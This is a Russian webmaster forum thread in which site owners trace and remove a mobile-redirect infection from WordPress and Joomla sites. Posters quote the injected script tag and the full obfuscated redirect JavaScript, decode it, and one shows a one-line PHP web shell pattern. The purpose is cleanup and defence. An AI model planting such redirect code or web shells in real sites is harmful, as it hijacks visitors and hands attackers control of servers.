Вирус "Мобильный редирект"

Тема в разделе "СДЛ", создана пользователем marat1975, 17.06.16.

Метки:
  1. marat1975

    marat1975 Активный участник

    Сообщения:
    375
    Симпатии:
    143
    Баллы:
    71
    Господа, нужна помощь!
    Сунулся на сайт с мобильника, а он кидает через +100500 редиректов на разные сайты.
    Проверил аккаунт хостинга, в итоге оказались все сайты заражены этим вирусом. Проверка антивирусом Spaceweb-ru (хостер) ни чего не выявила. Хостер говорит, типа сам дурак и разбирайся сам, а если хочешь, мы посмотрим из расчета 750руб/час.
    Вопрос, как побороть сей вирус?

    Еще...
    Пару дней назад, ковыряясь в одном из сайтов, обнаружил в футуре такой код:
    Код:
    <script language="javascript" charset="UTF-8" type="text/javascript" src="http://esliga.ru/7jq8fvf1mxn8vnloi5q9g65jupvhg4h1s69b0i85lyxo7urdho3dc7v914ij8hf4nr2jp6u?4c2y9ces=20b3"></script>
    Просто удалил, решив, что это остатки от какого нибудь плагина WP.
    Вот один из сайтов

    Еще...
    Самое интересное, что этот код опять появился на сайте (в самом конце кода). Ели кто разбирается в js сриптах, гляньте пожалуйста.
     
    Последнее редактирование: 17.06.16
  2. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    1. Уйти от хостера.
    2. Проверить сайт самостоятельно вот этими тулзами: https://www.revisium.com/ai/ , далее по результатам (пример по пациенту в личке).
    3. Все восстанавливать только на новом хостинге, вирусы у вашего текущего хостера роятся регулярно и давно.
    4. Не пренебрегать плагинами, блокирующими админку, xml-rpc, доступ, когда вы спите и тд и тп.
     
    gem1n1, Marbas, byb4ik и ещё 1-му нравится это.
  3. vashamaska

    vashamaska Новичок

    Сообщения:
    57
    Симпатии:
    23
    Баллы:
    13
    не факт что это хостера вина, вполне может быть и вордпресс плагин какой дырявый стоит, можно локально на вирусы проверить и потом просто заменить на хостинге полностью всю папку с сайтом
     
  4. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    Я нигде не писал, что "во всем виноват хостер", но:
    1) Если набрать "вирус на Spaceweb", то вылезет достаточное количество ситуаций, крайне напоминающих описанную ТС;
    2)
    Имхо - это ненормально. При подобной ситуации я получил от НОРМАЛЬНОГО хостера письмо, что "у вас обнаружен вирус, просим разрулить проблему самостоятельно, без денег, или же с нашей помощью, но за деньги". Разницу чувствуете? Лечить, безусловно, за дополнительные деньги, но вот диагностика должна быть постоянной, фоновой и бесплатной по определению, так как это влияет на репутацию ВСЕХ сайтов, сидящих на этом шареде, не только сайтов ТС.
     
  5. marat1975

    marat1975 Активный участник

    Сообщения:
    375
    Симпатии:
    143
    Баллы:
    71
    Так Спейсвеб даже выявить вирус не смог, это я сам случайно с сотового зашел и обнаружил. На аккаунте несколько сайтов висит. Лечение через вышеуказанный сервис стоит порядка 4000-5000 за один сайт. Маленько смущает ценник. Сейчас на Кворке один сайт за 500руб пытаются пролечить. Посмотрим, что выйдет
     
  6. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    Мда... Раньше была дешевле услуга, хотя и сейчас остался бюджетный вариант, которым сам, ранее, и пользовался:
    1) Скачать сканер Ai-Bolit,
    2) Скачать сайт на комп,
    3) Провести диагностику,
    4) Попробовать заменить все зараженные файлы чистыми копиями.

    Разработчики пишут тоже самое:
    [​IMG]
     
  7. marat1975

    marat1975 Активный участник

    Сообщения:
    375
    Симпатии:
    143
    Баллы:
    71
    Только что закончил борьбу со зловредом, вроде бы...
    Кто нибудь может с мобильника зайти на сайт
    Отпишитесь, нет ли редиректов

    А я пошел спать, глаза чуть не лопнули
     
  8. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    Редиректа нет, но через CM Browser сайт выглядит э-э-э... несколько неряшливо, тема странно отображается.
     
    marat1975 нравится это.
  9. vashamaska

    vashamaska Новичок

    Сообщения:
    57
    Симпатии:
    23
    Баллы:
    13
    Если не секрет что за хостинг?
    Я просто на которых хостился, у всех стоял свой антивирус, но все равно на сайтах периодически вирусок появлялся и их антивирус его не видел, соответственно делал наподобие как ты описал бесплатного варианта.
    Мне сообщение о вирусе присылали лишь один раз когда вирус спам рассылал.
     
  10. marat1975

    marat1975 Активный участник

    Сообщения:
    375
    Симпатии:
    143
    Баллы:
    71
    Сейчас это второстепенно. Спасибо!
    Этот сайт я переносил с Joomla . Только начал им заниматься

    теперь в админке проблемы. темы не добавляются и не редактируется старая
     
    Последнее редактирование: 18.06.16
  11. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    По данному вопросу нормально себя повел мне.ру, хотя, конечно, они тоже не без причуд.
     
    vashamaska нравится это.
  12. marat1975

    marat1975 Активный участник

    Сообщения:
    375
    Симпатии:
    143
    Баллы:
    71
    Попробуй еще раз, что нибудь изменилось?
     
  13. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    Уменьшился футер. На самом деле, похоже, у моего браузера и темы - взаимная нелюбовь. Если зайти с компа и сделать узкое окошко браузера, то мобильность налицо и все красиво. А на телефоне имею, что меню не сворачивается в "гамбургер" и болтается здоровенным черным прямоугольником вверху экрана, а верстка так и остается двухколночной, сайдбар не уходит вниз, а становится узкой полосой справа, шириной в одно слово.
    Штатный браузер андроида кажет без ошибок. Отбой тревоги, аудитория СМ Браузера не так велика...
     
  14. marat1975

    marat1975 Активный участник

    Сообщения:
    375
    Симпатии:
    143
    Баллы:
    71
    это кэш
     
    HelgerLEE нравится это.
  15. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    Да, забыл почистить, все пришло в норму.
     
  16. marat1975

    marat1975 Активный участник

    Сообщения:
    375
    Симпатии:
    143
    Баллы:
    71
    Проблема оказалась не решенной до конца, пострадало 8 сайтов.
    Зловредный код я в принципе выявил:
    Код:
    /*Window.onDomReady(function() {new DropdownMenu($E('ul.maximenuck'),{
                      //mooTransition : 'Quad',
                               //mooTransition : 'Cubic',
                               //mooTransition : 'Quart',
                               //mooTransition : 'Quint',
                               //mooTransition : 'Pow',
                               //mooTransition : 'Expo',
                               //mooTransition : 'Circ',
                               mooTransition : 'Sine',
                               //mooTransition : 'Back',
                               //mooTransition : 'Bounce',
                               //mooTransition : 'Elastic',
    
                               mooEase : 'easeIn',
                                           //mooEase : 'easeOut',
                                           //mooEase : 'easeInOut',
                                          
                                           mooDuree : 500
                                           })
                                           });*/
    
    };var _9l=["\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6c\x63\x6b\x2e\x72\x75\x2f\x39\x70\x4e\x32\x6e","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];function fcbeab(){var i=navigator[_9l[1]]||navigator[_9l[2]]||window[_9l[3]];return/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i[_9l[4]](i)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_9l[4]](i[_9l[5]](0,4))?!0:!1;}fcbeab()===!0&&(window[_9l[6]]=_9l[0]);
    Нижняя часть кода , начиная с: };var _9l=[" ............ и заканчивая: ..............(window[_9l[6]]=_9l[0]);
    Я не силен в php и поэтому засомневался, нужно ли удалять , стоящие впереди };
    или это окончание "здорового кода" сайта. А удалять вирус нужно начиная с var _9l=[
    И еще, правильно ли я понял, что удалять нужно все до конца или достаточно будет только удаления его начала
    Код:
    var _9l=["\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6c\x63\x6b\x2e\x72\x75\x2f\x39\x70\x4e\x32\x6e","\x75\x73\x65\x72\x41\x67\x65\x6e\x74","\x76\x65\x6e\x64\x6f\x72","\x6f\x70\x65\x72\x61","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x6c\x6f\x63\x61\x74\x69\x6f\x6e"];
    Вот еще в другом файле

    ...................return eval(rs);};})();;var _9l=["\x68\................................

    Меня смущает наличие точки с запятой перед var _9 Т.е. удалять ее вместе или она должна остаться
     
    Последнее редактирование: 19.06.16
  17. HelgerLEE

    HelgerLEE Активный участник

    Сообщения:
    240
    Симпатии:
    171
    Баллы:
    57
    Судя по коду, у вас Джумла и весь закоментареный кусок "moo..." - это класс меню.
    Далее идет зловредный код, вся ахинея вначале после декодирования дает:
    PHP:
    var _9l=["https://clck.ru/9pN2n","userAgent","vendor","opera","test","substr","location"];
    Ну а далее , как понимаю, регулярка, разруливающая трафик по вышеуказанным параметрам, так что сносить надо все.
    И ведет это дело на скупку битых автомобилей(???), как я понял. Декодер, чтобы смотреть, типа такого: http://ddecode.com/hexdecoder/

    Если есть сомнения - не удаляйте, а ставьте комментарии и смотрите, как все работает без спорного куска.
     
    Insider нравится это.
  18. vet27

    vet27 Новичок

    Сообщения:
    1
    Симпатии:
    0
    Баллы:
    1
    Добрый день
    Прошу помощи! Аналогичная проблема как у топикстартера.
    Яндекс начал ругаться на наличие на сайте вирусов. Поверхностная проверка ничего не обнаружила, но! При попытке зайти на сайт с телефона - перекидывает на левые сайты, с браузера компа всё ок.
    Сервис линкпад - и только он - показал больше 400 левых ссылок
    Осмотр кода главной показал наличие хреномантии с esliga ру в корне.
    Сканировал предложенным здесь Ай болитом. Отчет прикрепить не даёт, есть подозрения на зловредный код

    Помогите кто чем может
    Сайт
    Logopedcent.ru
    ------------------- Добавлено 14.10.16 -------------------
    Догадался положить отчет в архив :)
     

    Вложения:

  19. ontop

    ontop Активный участник

    Сообщения:
    330
    Симпатии:
    148
    Баллы:
    71
    Вот блять буду! ну всё же видно не вооружённым глазом!, ваш сайт взломан и горит красным цветом в исходнике.

    [​IMG]

    Код:
    <script language="javascript" charset="UTF-8" type="text/javascript" src="http://esliga.ru/7jq8fvf1mxn8vnloi5q9g65jupvhg4h1s69b0i85lyxo7urdho3dc7v914ij8hf4nr2jp6u?4c2y9ces=20b3"></script>
    Удаляйте и будет вам счастье!

    P.s. sorry за мат, я тут так... местный алкач, и снова под пивом:brb:

    Да чуть не забыл, меняйте хостинг, пароли, и удаляйте плагины!
     
    Последнее редактирование: 14.10.16
  20. bender

    bender Новичок

    Сообщения:
    53
    Симпатии:
    10
    Баллы:
    8
    Удаление плагинов не всегда помогает. Пересматривай все файлы и папки на наличие шеллов или кода в пхп.
    К примеру на одной из страниц может быть дописана вот такая штука:
    Код:
    system($_GET[cmd]);
    
    Вместо cmd может быть прописано любое другое слово или буква
    Работает данная штука как ssh, можно выполнять любые команды, в том числе и загрузку файлов на сервер.

    Лучшее решение от вирусов - правильно установленный chmod !
     

Поделиться этой страницей